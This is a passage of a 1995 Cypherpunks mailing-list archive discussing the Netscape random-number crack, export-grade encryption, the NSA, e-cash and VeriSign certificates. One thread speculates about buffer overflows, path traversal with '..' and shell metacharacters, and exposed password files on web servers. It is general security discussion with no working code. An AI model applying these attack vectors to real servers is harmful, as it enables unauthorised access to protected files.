Netscape's security when it first introduced its browser, but Netscape declined. "They're asking us to review it this time," he said. A month ago, a student at France's Ecole Polytechnique cracked the same weaker encryption system that U.S. government policy forces Netscape to use in a foreign version of its Navigator software. To break the code, the student used 120 computer workstations and two supercomputers working for eight days to break the so-called 40-bit encryption system, a number that refers to length of the encoding "key," which is used to scramble data. Netscape sells a far stronger version of its software that includes 128-bit key length, but is prevented by the government from distributing it on the Internet. The government fears that such strong encryption could fall into the hands of terrorists who might use it to communicate without fear of being tapped by U.S. security agencies. Security experts, however, noted that the same problem exists with the stronger software. ... __o .. -\<, Chris.Claborne at SanDiegoCA.ATTGIS.Com ...(*)/(*). CI$: 76340.2422 http://bordeaux.sandiegoca.attgis.com/ PGP Pub Key fingerprint = A8 FA 55 92 23 20 72 69 52 AB 64 CC C7 D9 4F CA Avail on Pub Key server. PGP-encrypted e-mail welcome! From unicorn at polaris.mindport.net Mon Sep 18 21:20:38 1995 From: unicorn at polaris.mindport.net (Black Unicorn) Date: Mon, 18 Sep 95 21:20:38 PDT Subject: NYT on Netscape Crack In-Reply-To: <199509190355.XAA01329@frankenstein.piermont.com> Message-ID: I've been having mail problems of late. Did you get my letter on your tax issue? --- "In fact, had Bancroft not existed, potestas scientiae in usu est Franklin might have had to invent him." in nihilum nil posse reverti 00B9289C28DC0E55 E16D5378B81E1C96 - Finger for Current Key Information From jya at pipeline.com Mon Sep 18 21:20:46 1995 From: jya at pipeline.com (John Young) Date: Mon, 18 Sep 95 21:20:46 PDT Subject: FC's Opus Message-ID: <199509190420.AAA16227@pipe4.nyc.pipeline.com> The NY Times reports in tomorrow's paper that it and The Washington Post are publishing the Unabomber's 35,000-word manifesto as a separate pullout in The Washington Post tomorrow, as advised by AG Reno and FBI Director Freeh. From tcmay at got.net Mon Sep 18 21:23:36 1995 From: tcmay at got.net (Timothy C. May) Date: Mon, 18 Sep 95 21:23:36 PDT Subject: NSA and Netscape Crack (Re: NYT on Netscape Crack) Message-ID: At 3:00 AM 9/19/95, John Young wrote: > The New York Times, September 19, 1995, pp. A1, D21. > > > Security Flaw Is Discovered In Software Used in Shopping > > By John Markoff > The discovery is the second reported security weakness in > the Netscape program to be posted on the Cypherpunks list > in the last month. In August, Damien Doligez, a student at Seriously, where's the NSA when you really need 'em? If the "flaws" are being found by our group, as John notes, just what is the NSA doing in the _second_ role it is supposed to have, it's "COMSEC," or communications security, role? (Note: As outlined by Bamford, and others, the Agency has a dual role: penetrating communications it is chartered to penetrate, and helping to secure communications it is chartered to help secure. Traditionally, the penetrating side is called SIGINT or COMINT, and the securing side is called COMSEC. The names may have changed by now.) Personally, I don't actually _want_ them vetting the work of others, but I think this whole series of events with Netscape makes it abundantly clear that the supposed "dual role" of the NSA in both breaking ciphers and in ensuring higher security is a farce. If the NSA had not found the flaws our two Berkeley grad students found, we've grossly overestimated them as a threat. And if they found the flaws but said nothing, what does this say about their claimed COMSEC benefits to American interests? (Granted, not all of us are Americans, but I think you understand my point about the NSA claiming it has a role, then doing nothing concrete, and even being misleading in its plans and programs.) If the NSA _really_ wants to really help secure communications against fraud, eavesdroppers, and foreign intelligence agencies, it can do so by immediately relaxing the restrictions on crypto export. While this may not stop things like weak random number generators, it moves us to an era of "strong" crypto and away from the "toy" crypto the NSA seems to want us to have. I think, however, it's clear by now that they have little interest in helping to secure communications and that weak "toy" systems are their preference. --Tim May ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^756839 | black markets, collapse of governments. "National borders are just speed bumps on the information superhighway." From perry at piermont.com Mon Sep 18 21:25:03 1995 From: perry at piermont.com (Perry E. Metzger) Date: Mon, 18 Sep 95 21:25:03 PDT Subject: Brute Force and Smart Force In-Reply-To: <199509190405.AAA03711@homeport.org> Message-ID: <199509190424.AAA01393@frankenstein.piermont.com> Adam Shostack writes: > Perhaps we should refocus our efforts on attacking PGP, to see > if there are holes there? (I'm not suggesting there are, but it > would be nice to see some code written to extend Crack to phrases, > do some more code review, etc.) Probably a worthwhile enterprise. Unfortunately, Netscape and the like are low hanging fruit -- its much simpler to find holes in things, er, of that, er, ah, quality -- and one probably rightfully gets more press for breaking them. Perry From perry at piermont.com Mon Sep 18 21:28:11 1995 From: perry at piermont.com (Perry E. Metzger) Date: Mon, 18 Sep 95 21:28:11 PDT Subject: NYT on Netscape Crack In-Reply-To: Message-ID: <199509190427.AAA01402@frankenstein.piermont.com> Black Unicorn writes: > I've been having mail problems of late. > Did you get my letter on your tax issue? Yes, but I've been preoccupied by the latest internet political scandal over domain registration. Thank you greatly for the information; I'll probably ask you a question or two within a few days when my mail volume goes below 500 a day again. Perry From perry at piermont.com Mon Sep 18 21:28:51 1995 From: perry at piermont.com (Perry E. Metzger) Date: Mon, 18 Sep 95 21:28:51 PDT Subject: NYT on Netscape Crack In-Reply-To: Message-ID: <199509190428.AAA01410@frankenstein.piermont.com> Eek. Lovely accident. Never reply to "all" without checking the "to" list. Sigh. Perry From Sal at panix.com Mon Sep 18 21:30:20 1995 From: Sal at panix.com (Sal Denaro) Date: Mon, 18 Sep 95 21:30:20 PDT Subject: AOL monitoring In-Reply-To: Message-ID: <+3OXwAgbBgzR084yn@panix.com> In article , you wrote: > A further hint as to why this won't work: the client software doesn't > keep track of which messages you've read in a discussion area, AOL's > server's do. How do I know this? Because I use AOL on a Mac from home, Ohhh-God, not again... Can anyone remember the Prodigy rumor? How IBM was snooping around your hard disk, and it turned out to be nothing but a swapfile. Does "Good times" ring a bell? And don't get me started on MicroSoft Network rumors... 1) 90% of the FTP sites I use mention that they log xfers. 2) My .newsrc file can tell anyone that I read alt.hackers and alt.2600 3) My address book shows who I send mail often enough to warrent me putting in a nickname. 4) My sent-mail folder shows who I sent mail to in the past year. 5) My bookmark file shows that I read the NYC-Speedtraps page one or two time a week. I am sure that AOL, Prodigy, CompuServe and Acme Internet all log what mail/news/web pages/ftp sites you have visited, in one way or another. Does this bother me? A little. I use a local Internet provider with an OS I understand enough to know what is logged and what is not logged. My fear is not LEA, but crackers. As long as I make myself a hard target- they vultures will look elseware. I repeat this like a mantra yet no one belives me- IF YOU WANT PRIVACY, DON'T USE THE PHONE. Once the headset is raised, big brother is online. If you do not like those rules, don't play the game. -- Salvatore Denaro sal at panix.com I waited for the joke/It never did arrive. Yes, I use PGP Words I thought I'd choke/I hardly recognize. From ponder at wane-leon-mail.scri.fsu.edu Mon Sep 18 21:32:59 1995 From: ponder at wane-leon-mail.scri.fsu.edu (P.J. Ponder) Date: Mon, 18 Sep 95 21:32:59 PDT Subject: taxonomies of 'real money' and e-cash In-Reply-To: Message-ID: On the 15th of September, Tim May wrote - . . . > "Digital money" currently has only a few ways of dealing with transfers of > value in transactions. A lot of the problems come, in my view, from this > relatively spartan set of "primitives." > > Where are the cryptographic equivalents of: > > - money orders > > - promissary notes > > - receipts > > - warrants > > - lockboxes > > - bearer bonds > > - options > > - time deposits > > - coupons > > - escrow > > - IOUs > > - zero coupon bonds > > - checks > > ...and so on. The terms in any good dictionary of financial terms (such as > the "MIT Dictionary of Modern Economics," ed. by David Pearce, 1992). (Many > of these things are built up out of more basic things, with mix-ins from > other classses, or with modified methods.) > > A look at any book on money and finance shows a rich "microworld" of > "things" and "procedures" (classes and methods attached to classes). The > classes have subclasses, and the methods have various behaviors and > "expectations" attached (more than just simple class behavior, more of an > AI or agent flavor, in my view). > . . . . > > --Tim May > > ---------:---------:---------:---------:---------:---------:---------:---- > Timothy C. May | Crypto Anarchy: encryption, digital money, > tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero > Corralitos, CA | knowledge, reputations, information markets, > Higher Power: 2^756839 | black markets, collapse of governments. > "National borders are just speed bumps on the information superhighway." > Maybe I'm missing the larger point, but isn't it accurate that in the digital world, one protocol or procedure may take the place of perhaps several of the 'real-world' procedures or protocols? An effective mechanism of signing with non-repudiation that was recognized as binding on the signer would permit 'checks', 'promissory notes', 'IOUs', and 'warrants'. Some of the other species listed in your post aren't really money, anyway. They are things you can buy with money, like stock certificates or Maseratis. One could conceivably buy convertible debentures with e-cash, the same as one could buy them with 'real money', but it doesn't follow that there should be some one-to-one mapping of real money objects and classes onto electronic analogues. Once again, i've probably missed the forest, but a couple of the trees distracted me. --PJ Ponder From shields at tembel.org Mon Sep 18 21:40:47 1995 From: shields at tembel.org (Michael Shields) Date: Mon, 18 Sep 95 21:40:47 PDT Subject: PGP for Linux 1.2.8 In-Reply-To: Message-ID: A non-text attachment was scrubbed... Name: not available Type: application/pgp Size: 14 bytes Desc: not available URL: From sameer at c2.org Mon Sep 18 22:02:45 1995 From: sameer at c2.org (sameer) Date: Mon, 18 Sep 95 22:02:45 PDT Subject: NYT on Netscape Crack In-Reply-To: <199509190355.XAA01329@frankenstein.piermont.com> Message-ID: <199509190457.VAA20451@infinity.c2.org> > > Not, of course, that they disclosed it before -- it was found by > reverse engineering the distributed executable. Not, of course, that > they have a choice in the matter of whether to disclose it -- they > will be "disclosing" how its done as soon as they release the > code. Not, of course, that security through obscurity does any good -- > it just magnifies the pain. Once netscape is patched with a stronger PRNG if someone can crack -that- one too, then they will get a T-shirt as well. Perhaps I should offer the t-shirt for just revealing the algorithim used w/o actually cracking it, just to deal with that statement from "Netscape officials". I emphasized in my conversation with the SFChronicle today that 'security by obscurity' doesn't work. Hopefully that will be reflected in the article. -- sameer Voice: 510-601-9777 Network Administrator FAX: 510-601-9734 Community ConneXion: The NEXUS-Berkeley Dialin: 510-658-6376 http://www.c2.org (or login as "guest") sameer at c2.org From jya at pipeline.com Mon Sep 18 22:03:04 1995 From: jya at pipeline.com (John Young) Date: Mon, 18 Sep 95 22:03:04 PDT Subject: FC's Opus Message-ID: <199509190502.WAA01521@usr1.primenet.com> Radio is blaring it out on KFAN and ABC RADIO now. What if all it is, is a Detweiler tentacle? hahahaha Love Always, Carol Anne.....coming to DC and NYC soon The NY Times reports in tomorrow's paper that it and The Washington Post are publishing the Unabomber's 35,000-word manifesto as a separate pullout in The Washington Post tomorrow, as advised by AG Reno and FBI Director Freeh. From stevenw at iglou.com Mon Sep 18 22:07:06 1995 From: stevenw at iglou.com (Steven Weller) Date: Mon, 18 Sep 95 22:07:06 PDT Subject: AOL monitoring Message-ID: >Ohhh-God, not again... > >Can anyone remember the Prodigy rumor? How IBM was snooping around >your hard disk, and it turned out to be nothing but a swapfile. Does >"Good times" ring a bell? And don't get me started on MicroSoft >Network rumors... > >1) 90% of the FTP sites I use mention that they log xfers. > >2) My .newsrc file can tell anyone that I read alt.hackers and alt.2600 > >3) My address book shows who I send mail often enough to warrent me > putting in a nickname. > >4) My sent-mail folder shows who I sent mail to in the past year. > >5) My bookmark file shows that I read the NYC-Speedtraps page one or > two time a week. Zterm and Anarchie both default to logging transfers. AOL on the Mac has a button on the download manager that lets you view a list of items you have downloaded. It's everywhere. ------------------------------------------------------------------------- Steven Weller | "The Internet, of course, is more +1 415 390 9732 | than just a place to find pictures | of people having sex with dogs." stevenw at iglou.com | -- Time Magazine, 3 July 1995 From tcmay at got.net Mon Sep 18 22:11:56 1995 From: tcmay at got.net (Timothy C. May) Date: Mon, 18 Sep 95 22:11:56 PDT Subject: taxonomies of 'real money' and e-cash Message-ID: At 11:33 PM 9/18/95, P.J. Ponder wrote: ... > Maybe I'm missing the larger point, but isn't it accurate that in the >digital world, one protocol or procedure may take the place of perhaps >several of the 'real-world' procedures or protocols? An effective >mechanism of signing with non-repudiation that was recognized as binding >on the signer would permit 'checks', 'promissory notes', 'IOUs', and I wasn't saying they are all on the same footing, or are all separate and compartmentalizable things. Clearly some of them are just slightly different "flavors" of other things. I listed a bunch of them not as a taxonomy or ontology, but as an illustration that there are many kinds of financial dealings, many kinds of roles played. That the real world has so many flavors of financial things could of course be due to inertia and ignorance, partly. But there are also different functionalities, and costs. Fitting the different needs, the different roles of the players. I won't go on and on, as my last post on this I think hit the main points, but consider how many flavors we have just of "checks": the "ordinary" checks we write, counter checks, dual-endorser checks, traveller's checks, and so on. (If you are arguing that only "digital cash" is a real issue, and all other constructs are "small matters of programming," then we disagree profoundly.) >'warrants'. Some of the other species listed in your post aren't really >money, anyway. They are things you can buy with money, like stock >certificates or Maseratis. One could conceivably buy convertible >debentures with e-cash, the same as one could buy them with 'real money', >but it doesn't follow that there should be some one-to-one mapping of real >money objects and classes onto electronic analogues. Once again, i've >probably missed the forest, but a couple of the trees distracted me. I don't get your point at all. I didn't claim they were all "money," whatver we may mean by _that_ loaded term, but that they are "things" with important features. And even your example of a thing like a "stock certificate" is not quite as simple as a thing like a "Maserati." My belief is counter to yours: I believe many or even most of the financial things and instruments we deal with today will be mapped into "digital economy" versions, albeit with new wrinkles and perhaps new names. (I could cite many examples of protocols that cannot be automated for use by agents if the only carry-over is "digital cash." Voting of shares, endorsements on instruments, various kinds of guarantees, reputations, and so on.) --Tim May ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^756839 | black markets, collapse of governments. "National borders are just speed bumps on the information superhighway." From wb8foz at nrk.com Mon Sep 18 22:47:48 1995 From: wb8foz at nrk.com (David Lesher) Date: Mon, 18 Sep 95 22:47:48 PDT Subject: Caribbean Internet Services? In-Reply-To: Message-ID: <199509190524.BAA00324@nrk.com> > ObCypherpunks Relevance: A couple of past or current list members have > nascent Internet plans in some of these islands. (I think one of them is > way south, just off Venezuela.) > I suspect "Caribbean Data Havens" and "Internet Sites" are further off than > they were a few months ago. > > --Tim May I'm not as familiar w/ the VI's as other parts of the Carib, but I can say that Curacao is no St. Thomas. It's got real buildings, high ground and substational infrastructure. You want primative, try Guyana. -- A host is a host from coast to coast.................wb8foz at nrk.com & no one will talk to a host that's close........[v].(301) 56-LINUX Unless the host (that isn't close).........................pob 1433 is busy, hung or dead....................................20915-1433 From merriman at arn.net Mon Sep 18 22:50:26 1995 From: merriman at arn.net (David K. Merriman) Date: Mon, 18 Sep 95 22:50:26 PDT Subject: PGP for Linux 1.2.8 Message-ID: <199509190604.BAA10003@arnet.arn.net> -----BEGIN PGP SIGNED MESSAGE----- At 04:39 AM 9/19/95 +0000, you "wrote": >Attachment Converted: D:\DOWNLOAD\MIME\RePGPfor.8 > I, for one, don't need Mystery MIME Attachments cluttering up my drive. If it's worth saying, then *say* it. Thank you. Dave Merriman -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBMF49HsVrTvyYOzAZAQE9aQP+JYa+eglyQCWWHxt5AexhapWyURziXX31 UN97I287MtJw62us1Usr3rpgSbm/7C1LaIZP4ucY0rEXXfvSRzbOPnaa0nPb18e/ Axf/5RzjsrgjvHiXsXm8e2/7z6fe+dByA6qSKLaE77yOkKNEoEPbUeJrjzX7PKSR qLFotWpaYvs= =VGzR -----END PGP SIGNATURE----- This is a test (3 UUE lines) of the unconstitutional ITAR - 1/713th of the PGP executable. See below for getting YOUR chunk! ------------------ PGP.ZIP Part [015/713] ------------------- M=$<(&L`#*IPP",(G6(,,S,`P](<2RWU96XCW86/JBYV8A\D8 at X'HB_9H#&\X MX'PCUB.,13B"X8`R?^J-:UB.M_`U\>[#)BS&5$0C,Y#^1CS>1`\T1QTXX6!3 M8H,),S$8G>&.WP(8IRA`-M['+`Q%&_C"">5-F%LX@<_Q$;*P'',Q$Z/AA[8M ------------------------------------------------------------- for next chunk to export --> http://dcs.ex.ac.uk/~aba/export/ <><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><> My web page: http://www.geopages.com/CapitolHill/1148 From shields at tembel.org Mon Sep 18 23:14:45 1995 From: shields at tembel.org (Michael Shields) Date: Mon, 18 Sep 95 23:14:45 PDT Subject: PGP for Linux 1.2.8 In-Reply-To: <199509190604.BAA10003@arnet.arn.net> Message-ID: > At 04:39 AM 9/19/95 +0000, you "wrote": > >Attachment Converted: D:\DOWNLOAD\MIME\RePGPfor.8 > > > > I, for one, don't need Mystery MIME Attachments cluttering up my drive. If > it's worth saying, then *say* it. I really don't know why any mailers call a monopart MIME message an "attachment". In that message, I suggested that the list be gated to the new hierarchy crypto.cypherpunks for the convenience of netnews without the visibility of Usenet, and offered to run a gateway on news.tembel.org. -- Shields. From Rick.Sciorra at hudson.lm.com Mon Sep 18 23:17:18 1995 From: Rick.Sciorra at hudson.lm.com (Rick.Sciorra at hudson.lm.com) Date: Mon, 18 Sep 95 23:17:18 PDT Subject: Automatic E-Mail Message-ID: <43khtu$bis@news1.warwick.net> Does anyone know of an E-Mail package that will automatically connect to the Internet and retreive mail at specific intervals? From rjc at clark.net Tue Sep 19 00:03:38 1995 From: rjc at clark.net (Ray Cromwell) Date: Tue, 19 Sep 95 00:03:38 PDT Subject: NYT on Netscape Crack In-Reply-To: <199509190355.XAA01329@frankenstein.piermont.com> Message-ID: <199509190703.DAA03247@clark.net> > > I suspect that there are far more flaws in Netscape. String buffer > overflows are another good guess here -- they are probably rampant > through the code both for the browser and the commerce server they > sell. I can't prove it myself, of course, given that I don't have the > time to rip the thing apart, but the same folks never seemed to learn > their lesson in release after release when they worked at NCSA, and > the only thing thats probably keeping their dignity here is the lack > of distributed source code. I doubt this in the case of the browser. Atleast as far as the parsing is concerned. There may be a buffer overflow for example, when you input the url in the "open" window, but that has to be done manually by the user and isn't a threat, like a "rogue homepage" would be. The reason I doubt string buffer overflows in the case of the browser is that it seems to be written in some object oriented language, perhaps C++ (or maybe just oo-C like BSAFE). Once you have a general robust String class, you can prove it's non-overflowable, and therefore no composition of operations from the browser code will overflow it (unless of course, you break language safety by using casts and pointer manipulation) Secondly, Netscape has been very robust in my own testing against these common bugs. One of the things I've done lately is "tiger team" attacks against servers and browsers. (of course, sendmail is a brilliant counter example) (if you can find a call to gets() in Netscape, I will instantly retreat ;-) ) Netscape's security maybe bad, but the rest of their browser, or atleast their development process, is good engineering. They've built a very complex application, fairly quickly, that runs with very few bugs, across a wide variety of operating systems and GUI's, while maintaining a consistent user interface and feature set. Netscape 2.0 incorporated Java, LiveObjects, and more HTML3.0 in almost record time. (I wasn't expecting a Java capable Netscape until atleast December). I'd like to see Microsoft develop a piece of code that quickly that runs on umteen different flabors of Unix, MacOS, and Win3.1/95/NT. Hell, they can't even write code that runs smoothly across all three flavors of their operating system. -Ray From sameer at c2.org Tue Sep 19 00:18:35 1995 From: sameer at c2.org (sameer) Date: Tue, 19 Sep 95 00:18:35 PDT Subject: NYT on Netscape Crack In-Reply-To: <199509190703.DAA03247@clark.net> Message-ID: <199509190713.AAA01128@infinity.c2.org> > > I doubt this in the case of the browser. Atleast as far as the > parsing is concerned. There may be a buffer overflow for example, Buffer overflow seems like a much greater concern when dealing with a server. Particularly one which is supposedly "secure", and accessing "secured" documents. Even with the server running as 'nobody' if someone can implement buffer overflow to get access to documents they shouldn't then that would count as a pretty significant hack. I suspect that the server is where the majority of the bugs lie. My Hack Netscape page emphasizes the server as a place to look for holes. > when you input the url in the "open" window, but that has to be > done manually by the user and isn't a threat, like a "rogue homepage" > would be. The reason I doubt string buffer overflows in the case of > the browser is that it seems to be written in some object oriented > language, perhaps C++ (or maybe just oo-C like BSAFE). Once you > have a general robust String class, you can prove it's non-overflowable, > and therefore no composition of operations from the browser code will > overflow it (unless of course, you break language safety by using > casts and pointer manipulation) Secondly, Netscape has been very > robust in my own testing against these common bugs. One of the things > I've done lately is "tiger team" attacks against servers and browsers. > (of course, sendmail is a brilliant counter example) > (if you can find a call to gets() in Netscape, I will instantly > retreat ;-) ) > > Netscape's security maybe bad, but the rest of their browser, or atleast > their development process, is good engineering. They've built a very > complex application, fairly quickly, that runs with very few bugs, > across a wide variety of operating systems and GUI's, while maintaining > a consistent user interface and feature set. Netscape 2.0 incorporated > Java, LiveObjects, and more HTML3.0 in almost record time. (I wasn't > expecting a Java capable Netscape until atleast December). I'd like to > see Microsoft develop a piece of code that quickly that runs on > umteen different flabors of Unix, MacOS, and Win3.1/95/NT. Hell, they > can't even write code that runs smoothly across all three > flavors of their operating system. > > -Ray > > > > > > -- sameer Voice: 510-601-9777 Community ConneXion FAX: 510-601-9734 An Internet Privacy Provider Dialin: 510-658-6376 http://www.c2.org (or login as "guest") sameer at c2.org From rjc at clark.net Tue Sep 19 00:34:36 1995 From: rjc at clark.net (Ray Cromwell) Date: Tue, 19 Sep 95 00:34:36 PDT Subject: NYT on Netscape Crack In-Reply-To: <199509190713.AAA01128@infinity.c2.org> Message-ID: <199509190734.DAA09824@clark.net> > > > > > I doubt this in the case of the browser. Atleast as far as the > > parsing is concerned. There may be a buffer overflow for example, > > Buffer overflow seems like a much greater concern when dealing > with a server. Particularly one which is supposedly "secure", and > accessing "secured" documents. Even with the server running as > 'nobody' if someone can implement buffer overflow to get access to > documents they shouldn't then that would count as a pretty significant > hack. Right. Some other common ones are ".." and shell meta characters in paths. Also, accessing files that you don't have permissions to. Even if the server is perfect, the setup could be bad. For instance, if you use CERN's Authentication scheme for protecting URL hierarchies, do not put the passwd/group file within the hierarchy. I've noticed this before on some servers, like http://www.isp.com/company1/passwd contains the passwd file for the http://www.isp.com/company1/ URL directory. Although it is convenient to store the passwd file within the hierarchy it is protecting, care must be taken to make it unreadable by normal HTTP requests. It's better to put it in a configuration directory somewhere where no server has access to. (I've seen this mistake plenty of times) A barebone's web server is a pretty simple piece of a software compared to a browser (or sendmail), so it should be possible to make them much more secure. -Ray From sameer at c2.org Tue Sep 19 00:53:18 1995 From: sameer at c2.org (sameer) Date: Tue, 19 Sep 95 00:53:18 PDT Subject: NYT on Netscape Crack In-Reply-To: <199509190734.DAA09824@clark.net> Message-ID: <199509190748.AAA03614@infinity.c2.org> > http://www.isp.com/company1/passwd contains the passwd file for the > http://www.isp.com/company1/ URL directory. Although it is convenient > to store the passwd file within the hierarchy it is protecting, care > must be taken to make it unreadable by normal HTTP requests. It's better > to put it in a configuration directory somewhere where no server > has access to. (I've seen this mistake plenty of times) The server process itself still needs access to that file though in order to verify passwords, so it can't be totally protected-- a bug in the server might reveal the password file. A relatively minor point.. > > A barebone's web server is a pretty simple piece of a software compared > to a browser (or sendmail), so it should be possible to make them > much more secure. Right. The Netscape Commerce server, on the other hand, is by no means a barebones webserver. It has a full-featured API which allows dynamic loading of custom-written modules to handle every aspect of web servering. Its configurations files, while not as complex as sendmail config files, are rather complex. The server comes with an "GUI administration tool", which allows you to configure the server using netscape over HTTP to a special server, -running as root-, which can modify configuration files, restart the server, etc. (I am not sure if the administration server -must- run as root, but that is how it has been configured in the installations I have seen.) Even extremely good security programmers could probably not write such a complex program without bugs, particularly on the timescale for which you have commended Netscape. (Extremely good ethical security programmers may not even be -willing- to write such a complex program and declare it secure) There is actually an interesting parallel to sendmail in webservers..webservers have a very vital 'rewriting' phase, where they turn the url (/~sameer for example) into a filename (/u1/sameer/public_html/index.phtml) This phase is where it checks ownership, checks symlinks, etc. I figure that section may be rife with holes, given the incredibly powerful rewriting that the highly flexible servers can do these days. -- sameer Voice: 510-601-9777 Community ConneXion FAX: 510-601-9734 An Internet Privacy Provider Dialin: 510-658-6376 http://www.c2.org (or login as "guest") sameer at c2.org From jsw at neon.netscape.com Tue Sep 19 01:14:28 1995 From: jsw at neon.netscape.com (Jeff Weinstein) Date: Tue, 19 Sep 95 01:14:28 PDT Subject: NYT on Netscape Crack In-Reply-To: <199509190300.XAA05027@pipe4.nyc.pipeline.com> Message-ID: <43lu3k$7q6@tera.mcom.com> In article <199509190355.XAA01329 at frankenstein.piermont.com>, perry at piermont.com (Perry E. Metzger) writes: > > Markoff's article in the Times says: > > Netscape officials said today that they would strengthen > > the system, by making it significantly harder to determine > > the random number at the heart of their coding system. They > > said they would no longer disclose what data would be used > > to generate the random numbers. > > Not, of course, that they disclosed it before -- it was found by > reverse engineering the distributed executable. Not, of course, that > they have a choice in the matter of whether to disclose it -- they > will be "disclosing" how its done as soon as they release the > code. Not, of course, that security through obscurity does any good -- > it just magnifies the pain. Regardless of what Markoff implies, we do not intend to depend on security through obscurity. > I suspect that there are far more flaws in Netscape. String buffer > overflows are another good guess here -- they are probably rampant > through the code both for the browser and the commerce server they > sell. I can't prove it myself, of course, given that I don't have the > time to rip the thing apart, but the same folks never seemed to learn > their lesson in release after release when they worked at NCSA, and > the only thing thats probably keeping their dignity here is the lack > of distributed source code. Sigh. For your information the security code for 1.x versions of netscape was not even written by someone from NCSA. The current security team (which does not include the person who did the 1.x version) also does not include anyone from NCSA. While I can't guarantee that such buffer overflow error don't exist in our current products since I have not personally examined every line of code, your generalization from experience with mosaic is bogus. In the places in the code that I have seen where it looked like such errors could have crept in, I have found that the correct checks for buffer overflow have been in place. --Jeff -- Jeff Weinstein - Electronic Munitions Specialist Netscape Communication Corporation jsw at netscape.com - http://home.netscape.com/people/jsw Any opinions expressed above are mine. From cwe at Csli.Stanford.EDU Tue Sep 19 01:19:55 1995 From: cwe at Csli.Stanford.EDU (Christian Wettergren) Date: Tue, 19 Sep 95 01:19:55 PDT Subject: Brute Force and Smart Force In-Reply-To: <199509190424.AAA01393@frankenstein.piermont.com> Message-ID: <199509190819.BAA15784@Csli.Stanford.EDU> | Adam Shostack writes: | > Perhaps we should refocus our efforts on attacking PGP, to see | > if there are holes there? (I'm not suggesting there are, but it | > would be nice to see some code written to extend Crack to phrases, | > do some more code review, etc.) | | Probably a worthwhile enterprise. Unfortunately, Netscape and the like | are low hanging fruit -- its much simpler to find holes in things, er, | of that, er, ah, quality -- and one probably rightfully gets more | press for breaking them. What I don't understand is why the law-enforcement is so concerned about bruting things. It is probably quite easy to tap the keyboard, smart force, exchange the binary with the real thing etc for them? (Unless they want to read it all from a nice tipped-back armchair in a certain location? :-)) What I'm saying is that this kind of attack should work quite easily in the one-by-one cases, but not on a large scale, malicious data, trojan horses, outright bugging. So why all this Clipper (son-of-X) fuss? Ok, not for all data, especially not for the "untouched, rarely used" ones. But is this any different from hiding your diary in a very safe place anyway? /Christian From roy at cybrspc.mn.org Tue Sep 19 02:21:51 1995 From: roy at cybrspc.mn.org (Roy M. Silvernail) Date: Tue, 19 Sep 95 02:21:51 PDT Subject: VeriSign Introduces the First Digital ID Issuing Service In-Reply-To: <9509181742.aa29912@ncrhub1.ATTGIS.COM> Message-ID: <950919.012810.3g2.rnr.w165w@cybrspc.mn.org> -----BEGIN PGP SIGNED MESSAGE----- In list.cypherpunks, Chris.Claborne at SanDiegoCA.ATTGIS.COM quotes a VeriSign press release: > Class One Digital IDs: These IDs insure the uniqueness of a name or > e-mail address. Class One Digital IDs are primarily used for casual > World Wide Web browsing and secure e-mail. VeriSign offers > non-commercial Class One Digital IDs at no cost or VeriSign supported > commercial versions for $6. > Netscape Navigator 2.0 users will be able to download Class One Digital > IDs from VeriSign's new Online Digital ID Issuing Service on the World > Wide Web beginning in late October. I can forsee some possible DOS attacks against the Class One certificate. (p'raps I should get mine forthwith?) And what protection is VeriSign offering against the misuse of our certificates (given that VeriSign must undoubtedly hold copies of all the issued certs). - -- Roy M. Silvernail -- roy at cybrspc.mn.org perl -e '$x = 1/20; print "Just my \$$x! (adjusted for inflation)\n"' "What do you mean, you've never been to Alpha Centauri?" -- Prostetnic Vogon Jeltz -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBMF5kXBvikii9febJAQFu6QQAmA46r+MuUOprM/ETHPnzKVYWuc8vT22i xqzgV5ScNLPe2fjSBlWtazT+e1xbj6MQKzHfqJUZztvRfpD4U3h7xptuf5WjRhlt liHgrLvg9Nkq4azfQkS71ifW2cM4uZZpF0BrQsNxEsN5WiiYkBGFQCN8eRZ17s3i GnU/FjZbiGc= =o0wf -----END PGP SIGNATURE----- From stewarts at ix.netcom.com Tue Sep 19 02:30:09 1995 From: stewarts at ix.netcom.com (Bill Stewart) Date: Tue, 19 Sep 95 02:30:09 PDT Subject: Automatic E-Mail Message-ID: <199509190929.CAA23985@ix.ix.netcom.com> [This isn't quite on topic, though you could stretch it to deal with remailers. Can the winsock remailer do this?] At 10:50 PM 9/18/95 GMT, Rick.Sciorra at hudson.lm.com wrote: >Does anyone know of an E-Mail package that will automatically connect >to the Internet and retreive mail at specific intervals? Sigh. Folks have gotten too used to PC-market email systems, which are generally braindamaged by having been around operating systems where you can't just run a listner program that waits for somebody to call you when they want to send you mail, which of course fits in very well with letting ISPs avoid having to make outgoing phone calls instead of just receiving, plus the market reluctance of many of them to forward mail for you to competing mail services and the client/server-orientation that makes peer-to-peer services harder to implement. Unix systems did this job just fine on PDP11/70s, which could support a dozen or two users on a machine with about the horsepower of a PC/AT. And Henry Spencer could do that on a /44 :-) Just about anything that does UUCP can be set to do that, if you've got an ISP who doesn't charge you lots extra for using UUCP. Most high-end terminal emulation packages have scripting languages that let you call up and do stuff, which you should be able to call from timer programs; you can probably even find a free Kermit version that will do it. I use Eudora Light with Trumpet to call Netcom's newbie-friendly Netcruiser service; when I hit the menu item for send or retrieve mail, it pops through all the layers and dials, and hangs up when it's done. If Commercial Eudora can't already do that automagically, it should - ask Qualcomm to add it to the next version... Alternatively, Winsock programming isn't really all that hard, and POP3 is a pretty simple protocol, so you could roll your own. #--- # Bill Stewart, Freelance Information Architect, stewarts at ix.netcom.com # Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281 #--- From stewarts at ix.netcom.com Tue Sep 19 02:30:11 1995 From: stewarts at ix.netcom.com (Bill Stewart) Date: Tue, 19 Sep 95 02:30:11 PDT Subject: MIME attachments and ranting. Message-ID: <199509190929.CAA23989@ix.ix.netcom.com> >> >Attachment Converted: D:\DOWNLOAD\MIME\RePGPfor.8 >> I, for one, don't need Mystery MIME Attachments cluttering 